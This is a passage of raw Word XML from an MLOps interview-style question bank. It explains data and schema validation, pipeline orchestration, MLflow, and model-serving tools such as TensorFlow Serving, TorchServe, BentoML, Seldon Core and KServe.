        <w:br/>
        <w:br/>
        <w:t>* Evidently AI￼</w:t>
        <w:br/>
        <w:t>* WhyLabs￼</w:t>
        <w:br/>
        <w:t>* Prometheus￼</w:t>
        <w:br/>
        <w:t>* Grafana￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If feature drift becomes significant, retraining pipelines are usually triggered to maintain model performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1642. Explain data validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data validation is the process of verifying that input data is accurate, complete, consistent, and in the expected format before it is used for machine learning training or inference.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The goal is to ensure data quality and prevent bad or corrupted data from affecting model performance.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Data validation typically checks:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Schema consistency</w:t>
        <w:br/>
        <w:t>* Missing or null values</w:t>
        <w:br/>
        <w:t>* Data types</w:t>
        <w:br/>
        <w:t>* Duplicate records</w:t>
        <w:br/>
        <w:t>* Range validation</w:t>
        <w:br/>
        <w:t>* Outliers and anomalies</w:t>
        <w:br/>
        <w:t>* Feature distribution changes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If a feature like age suddenly contains negative values or unexpected categories, validation rules can detect and block that data.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, data validation is important because poor-quality data can lead to:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Incorrect predictions</w:t>
        <w:br/>
        <w:t>* Model drift</w:t>
        <w:br/>
        <w:t>* Training failures</w:t>
        <w:br/>
        <w:t>* Unstable production behavior</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Data validation is usually automated as part of ML pipelines using tools such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Great Expectations￼</w:t>
        <w:br/>
        <w:t>* TensorFlow Data Validation￼</w:t>
        <w:br/>
        <w:t>* Deequ￼</w:t>
        <w:br/>
        <w:t>* Apache Griffin￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is a critical step for building reliable and production-ready ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1643. What is schema validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Schema validation is the process of verifying that incoming data follows the expected structure, format, and data types defined for a dataset.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It ensures that the data schema used during training matches the data received during production or pipeline execution.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Schema validation typically checks:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Column names</w:t>
        <w:br/>
        <w:t>* Data types</w:t>
        <w:br/>
        <w:t>* Required fields</w:t>
        <w:br/>
        <w:t>* Number of columns</w:t>
        <w:br/>
        <w:t>* Data formats</w:t>
        <w:br/>
        <w:t>* Allowed values or constraints</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If a feature expected as an integer suddenly arrives as a string, schema validation detects the mismatch and prevents bad data from entering the ML pipeline.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, schema validation is important because schema changes can cause:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Pipeline failures</w:t>
        <w:br/>
        <w:t>* Incorrect predictions</w:t>
        <w:br/>
        <w:t>* Training errors</w:t>
        <w:br/>
        <w:t>* Feature inconsistencies</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Schema validation is usually automated in data pipelines using tools such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Great Expectations￼</w:t>
        <w:br/>
        <w:t>* TensorFlow Data Validation￼</w:t>
        <w:br/>
        <w:t>* Pandera￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps maintain data consistency, reliability, and stability in production ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1644. Explain ML pipeline orchestration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML pipeline orchestration is the process of automating, scheduling, coordinating, and managing different stages of the machine learning workflow in a reliable and scalable manner.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps organize the complete ML lifecycle, including:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Data ingestion</w:t>
        <w:br/>
        <w:t>* Data preprocessing</w:t>
        <w:br/>
        <w:t>* Feature engineering</w:t>
        <w:br/>
        <w:t>* Model training</w:t>
        <w:br/>
        <w:t>* Validation</w:t>
        <w:br/>
        <w:t>* Deployment</w:t>
        <w:br/>
        <w:t>* Monitoring</w:t>
        <w:br/>
        <w:t>* Retraining</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Orchestration ensures that these tasks run in the correct sequence with dependency management, retries, logging, and scheduling.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production MLOps systems, orchestration is important because ML workflows are complex, distributed, and often involve multiple teams and infrastructure components.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Workflow automation</w:t>
        <w:br/>
        <w:t>* Scalability</w:t>
        <w:br/>
        <w:t>* Fault tolerance</w:t>
        <w:br/>
        <w:t>* Reproducibility</w:t>
        <w:br/>
        <w:t>* Monitoring and alerting</w:t>
        <w:br/>
        <w:t>* Efficient resource utilization</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A scheduled pipeline may automatically:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Collect new data</w:t>
        <w:br/>
        <w:t>2. Validate and preprocess it</w:t>
        <w:br/>
        <w:t>3. Retrain the model</w:t>
        <w:br/>
        <w:t>4. Evaluate performance</w:t>
        <w:br/>
        <w:t>5. Deploy the new model if validation passes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common orchestration tools include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Kubeflow Pipelines￼</w:t>
        <w:br/>
        <w:t>* Apache Airflow￼</w:t>
        <w:br/>
        <w:t>* Argo Workflows￼</w:t>
        <w:br/>
        <w:t>* Prefect￼</w:t>
        <w:br/>
        <w:t>* Dagster￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ML pipeline orchestration is a core part of MLOps for building automated, production-grade ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1645. Explain Kubeflow Pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubeflow Pipelines￼ is a workflow orchestration component of Kubeflow used to automate, manage, and monitor machine learning workflows on Kubernetes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It allows teams to build reusable and scalable ML pipelines by defining each stage of the ML lifecycle as independent pipeline components.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typical stages include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Data ingestion</w:t>
        <w:br/>
        <w:t>* Data preprocessing</w:t>
        <w:br/>
        <w:t>* Feature engineering</w:t>
        <w:br/>
        <w:t>* Model training</w:t>
        <w:br/>
        <w:t>* Model evaluation</w:t>
        <w:br/>
        <w:t>* Deployment</w:t>
        <w:br/>
        <w:t>* Monitoring</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubeflow Pipelines helps manage:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Task dependencies</w:t>
        <w:br/>
        <w:t>* Scheduling</w:t>
        <w:br/>
        <w:t>* Retry handling</w:t>
        <w:br/>
        <w:t>* Logging</w:t>
        <w:br/>
        <w:t>* Experiment tracking</w:t>
        <w:br/>
        <w:t>* Pipeline versioning</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pipelines are usually written in Python using the Kubeflow SDK, and each step runs as a containerized workload on Kubernetes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Workflow automation</w:t>
        <w:br/>
        <w:t>* Scalability on Kubernetes</w:t>
        <w:br/>
        <w:t>* Reproducibility</w:t>
        <w:br/>
        <w:t>* Reusable pipeline components</w:t>
        <w:br/>
        <w:t>* GPU/CPU resource management</w:t>
        <w:br/>
        <w:t>* CI/CD integration</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A pipeline can automatically:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Fetch new data</w:t>
        <w:br/>
        <w:t>2. Validate and preprocess it</w:t>
        <w:br/>
        <w:t>3. Train a model</w:t>
        <w:br/>
        <w:t>4. Evaluate performance</w:t>
        <w:br/>
        <w:t>5. Deploy the model if validation succeeds</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubeflow Pipelines is widely used in production MLOps systems for building automated, scalable, and cloud-native ML workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1646. What is MLflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MLflow￼ is an open-source MLOps platform used to manage the complete machine learning lifecycle.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps teams with:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Experiment tracking</w:t>
        <w:br/>
        <w:t>* Model versioning</w:t>
        <w:br/>
        <w:t>* Model packaging</w:t>
        <w:br/>
        <w:t>* Model registry management</w:t>
        <w:br/>
        <w:t>* Model deployment</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>MLflow improves reproducibility and collaboration by tracking details such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Parameters</w:t>
        <w:br/>
        <w:t>* Metrics</w:t>
        <w:br/>
        <w:t>* Model artifacts</w:t>
        <w:br/>
        <w:t>* Source code versions</w:t>
        <w:br/>
        <w:t>* Training runs</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components of MLflow include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MLflow Tracking → Tracks experiments, metrics, and parameters</w:t>
        <w:br/>
        <w:t>* MLflow Projects → Packages ML code for reproducibility</w:t>
        <w:br/>
        <w:t>* MLflow Models → Standard format for model packaging and serving</w:t>
        <w:br/>
        <w:t>* MLflow Model Registry → Manages model versions, stages, and approvals</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production MLOps systems, MLflow is commonly used for:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Experiment management</w:t>
        <w:br/>
        <w:t>* CI/CD integration</w:t>
        <w:br/>
        <w:t>* Model governance</w:t>
        <w:br/>
        <w:t>* Rollback and version control</w:t>
        <w:br/>
        <w:t>* Deployment automation</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>MLflow integrates well with:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Docker￼</w:t>
        <w:br/>
        <w:t>* Kubernetes￼</w:t>
        <w:br/>
        <w:t>* Apache Airflow￼</w:t>
        <w:br/>
        <w:t>* Kubeflow￼</w:t>
        <w:br/>
        <w:t>* Cloud platforms like AWS, GCP, and Azure</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is one of the most widely used tools for experiment tracking and model lifecycle management in MLOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1647. Explain MLflow Tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MLflow Tracking￼ is a component of MLflow used to record, organize, and compare machine learning experiments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps track important experiment details such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Hyperparameters</w:t>
        <w:br/>
        <w:t>* Model metrics</w:t>
        <w:br/>
        <w:t>* Training runs</w:t>
        <w:br/>
        <w:t>* Model artifacts</w:t>
        <w:br/>
        <w:t>* Source code versions</w:t>
        <w:br/>
        <w:t>* Environment information</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Each experiment run is logged and stored so teams can compare different models and reproduce results easily.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>During model training, MLflow Tracking can automatically log:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Learning rate</w:t>
        <w:br/>
        <w:t>* Batch size</w:t>
        <w:br/>
        <w:t>* Accuracy</w:t>
        <w:br/>
        <w:t>* Loss values</w:t>
        <w:br/>
        <w:t>* Trained model files</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This helps identify which experiment produced the best-performing model.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits of MLflow Tracking include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Experiment reproducibility</w:t>
        <w:br/>
        <w:t>* Easy comparison of runs</w:t>
        <w:br/>
        <w:t>* Collaboration across teams</w:t>
        <w:br/>
        <w:t>* Better model governance</w:t>
        <w:br/>
        <w:t>* Simplified debugging and auditing</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>MLflow Tracking provides both:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* UI dashboard for visualization</w:t>
        <w:br/>
        <w:t>* APIs for programmatic logging</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, it is commonly integrated into training pipelines, CI/CD workflows, and model registries to manage ML experiments efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1648. What is MLflow Registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MLflow Model Registry￼ is a centralized repository in MLflow used to store, version, manage, and track machine learning models throughout their lifecycle.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps teams manage models in different stages such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Development</w:t>
        <w:br/>
        <w:t>* Staging</w:t>
        <w:br/>
        <w:t>* Production</w:t>
        <w:br/>
        <w:t>* Archived</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The Model Registry stores important information including:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model versions</w:t>
        <w:br/>
        <w:t>* Model artifacts</w:t>
        <w:br/>
        <w:t>* Metadata</w:t>
        <w:br/>
        <w:t>* Experiment references</w:t>
        <w:br/>
        <w:t>* Approval status</w:t>
        <w:br/>
        <w:t>* Deployment stages</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model version control</w:t>
        <w:br/>
        <w:t>* Easy rollback to previous versions</w:t>
        <w:br/>
        <w:t>* Collaboration between teams</w:t>
        <w:br/>
        <w:t>* Governance and auditability</w:t>
        <w:br/>
        <w:t>* Controlled production promotion</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>After training and evaluation, a model can be registered in MLflow Registry and promoted to production only after validation and approval.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, MLflow Registry is commonly integrated with:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* CI/CD pipelines</w:t>
        <w:br/>
        <w:t>* Kubernetes deployments</w:t>
        <w:br/>
        <w:t>* Automated retraining workflows</w:t>
        <w:br/>
        <w:t>* Canary and blue-green deployments</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It plays an important role in managing production-ready ML models reliably and systematically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1649. Explain TensorFlow Serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TensorFlow Serving￼ is a high-performance model serving system developed by  Google￼ for deploying machine learning models in production environments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is mainly used to serve TensorFlow models for real-time inference through REST or gRPC APIs.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>TensorFlow Serving allows models to be:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Loaded dynamically</w:t>
        <w:br/>
        <w:t>* Versioned</w:t>
        <w:br/>
        <w:t>* Scaled efficiently</w:t>
        <w:br/>
        <w:t>* Updated without downtime</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* High-performance inference</w:t>
        <w:br/>
        <w:t>* Model version management</w:t>
        <w:br/>
        <w:t>* REST and gRPC endpoints</w:t>
        <w:br/>
        <w:t>* Hot model reloading</w:t>
        <w:br/>
        <w:t>* Batch request support</w:t>
        <w:br/>
        <w:t>* Kubernetes and Docker integration</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production MLOps systems, TensorFlow Serving is commonly used for:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Real-time prediction APIs</w:t>
        <w:br/>
        <w:t>* Large-scale inference workloads</w:t>
        <w:br/>
        <w:t>* GPU-accelerated serving</w:t>
        <w:br/>
        <w:t>* Canary or blue-green model deployments</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example workflow:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Train a TensorFlow model</w:t>
        <w:br/>
        <w:t>2. Export the model in SavedModel format</w:t>
        <w:br/>
        <w:t>3. Load it into TensorFlow Serving</w:t>
        <w:br/>
        <w:t>4. Expose prediction APIs for applications</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>TensorFlow Serving is widely used because it provides low-latency, scalable, and production-ready ML model serving capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1650. What is TorchServe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TorchServe is an open-source model serving framework developed for deploying and serving PyTorch machine learning models in production environments.</w:t>
        <w:br/>
        <w:t>It is designed to provide scalable and high-performance inference for PyTorch models through REST and gRPC APIs.</w:t>
        <w:br/>
        <w:t>TorchServe helps with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model version management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autoscaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and logging</w:t>
        <w:br/>
        <w:t>Key features include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multi-model serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU support</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Custom handlers for preprocessing and postprocessing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * REST and gRPC endpoints</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics integration with Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes and Docker support</w:t>
        <w:br/>
        <w:t>Example workflow:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Train a PyTorch model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Package the model into a .mar archive</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Deploy it using TorchServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Expose APIs for prediction requests</w:t>
        <w:br/>
        <w:t>In MLOps, TorchServe is commonly used for scalable deployment of deep learning models in production systems, especially for NLP, computer vision, and generative AI workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1651. What is BentoML?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BentoML￼ is an open-source MLOps framework used to package, deploy, and serve machine learning models in production environments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps convert trained ML models into scalable API services that can be deployed on cloud platforms, Kubernetes, or Docker containers.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BentoML supports multiple ML frameworks such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* TensorFlow</w:t>
        <w:br/>
        <w:t>* PyTorch</w:t>
        <w:br/>
        <w:t>* Scikit-learn</w:t>
        <w:br/>
        <w:t>* XGBoost</w:t>
        <w:br/>
        <w:t>* Hugging Face models</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model packaging and versioning</w:t>
        <w:br/>
        <w:t>* REST and gRPC API serving</w:t>
        <w:br/>
        <w:t>* Docker and Kubernetes integration</w:t>
        <w:br/>
        <w:t>* Autoscaling support</w:t>
        <w:br/>
        <w:t>* Batch and real-time inference</w:t>
        <w:br/>
        <w:t>* Monitoring and observability integration</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, BentoML is commonly used to simplify model deployment and standardize inference services across teams.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example workflow:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Train a model</w:t>
        <w:br/>
        <w:t>2. Package it as a Bento service</w:t>
        <w:br/>
        <w:t>3. Containerize using Docker</w:t>
        <w:br/>
        <w:t>4. Deploy to Kubernetes or cloud platforms</w:t>
        <w:br/>
        <w:t>5. Expose prediction APIs</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>BentoML is popular because it provides an easy and production-ready way to operationalize ML models with scalable serving infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1652. Explain Seldon Core.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Seldon Core is an open-source MLOps platform used to deploy, scale, manage, and monitor machine learning models on Kubernetes.</w:t>
        <w:br/>
        <w:t>It allows teams to serve ML models as production-grade microservices with support for advanced deployment strategies and observability.</w:t>
        <w:br/>
        <w:t>Seldon Core supports models built using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scikit-learn</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * XGBoost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ONNX</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Custom Python models</w:t>
        <w:br/>
        <w:t>Key features include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time and batch inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes-native deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autoscaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A/B testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Canary deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Explainability integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * REST and gRPC APIs</w:t>
        <w:br/>
        <w:t>In production MLOps systems, Seldon Core is commonly used for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large-scale model serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multi-model deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic splitting between model versions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Production monitoring and governance</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>A new ML model can be deployed alongside the existing version, with only 10% of traffic routed to the new model for canary testing.</w:t>
        <w:br/>
        <w:t>Since it is Kubernetes-native, Seldon Core integrates well with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t>It is widely used for scalable and production-ready ML model deployment in cloud-native environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1653. What is KServe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: KServe is a Kubernetes-native model serving platform used to deploy, manage, and scale machine learning models in production environments.</w:t>
        <w:br/>
        <w:t>It is built on top of Kubernetes and Knative and provides serverless inference capabilities for ML workloads.</w:t>
        <w:br/>
        <w:t>KServe supports multiple ML frameworks such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scikit-learn</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * XGBoost</w:t>
        <w:br/>
